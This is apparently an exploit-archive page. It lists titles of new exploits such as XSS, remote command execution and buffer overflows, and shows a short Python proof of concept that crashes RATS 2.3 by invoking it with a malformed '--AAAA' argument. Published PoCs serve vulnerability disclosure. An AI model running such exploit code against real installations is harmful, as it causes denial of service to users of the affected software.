
9 new exploits Totemomail 4.x and 5.x - Persistent XSS C/C++ Offline Compiler and C For OS - Persistent XSS Gemtek CPE7000 - WLTCS-106 Administrator SID Retriever (MSF) Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (MSF) CompuSource Systems - Real Time Home Banking - Local Privilege Escalation Linux x64 - Bind Shell Shellcode Generator PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (MSF) NationBuilder Multiple Stored XSS Vulnerabilities Rough Auditing Tool for Security (RATS) 2.3 - Crash PoC
36 lines
747 B
Python
Executable file
36 lines
747 B
Python
Executable file
# Exploit Title: RATS 2.3 Crash POC
|
|
# Date: 25th April 2016
|
|
# Exploit Author: David Silveiro
|
|
# Author Contact: twitter.com/david_silveiro
|
|
# Website: Xino.co.uk
|
|
# Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads
|
|
# Version: RATS 2.3
|
|
# Tested on: Ubuntu 14.04 LTS
|
|
# CVE : 0 day
|
|
|
|
from shlex import split
|
|
from os import system
|
|
|
|
|
|
def crash():
|
|
|
|
try:
|
|
com = ('rats --AAAA')
|
|
return system(com)
|
|
|
|
except:
|
|
print("Is RATS installed?")
|
|
|
|
|
|
def main():
|
|
|
|
print("Author: David Silveiro ")
|
|
print("Website: Xino.co.uk ")
|
|
print("Title: POC RATS v2.3 Crash \n")
|
|
|
|
crash()
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main()
|
|
|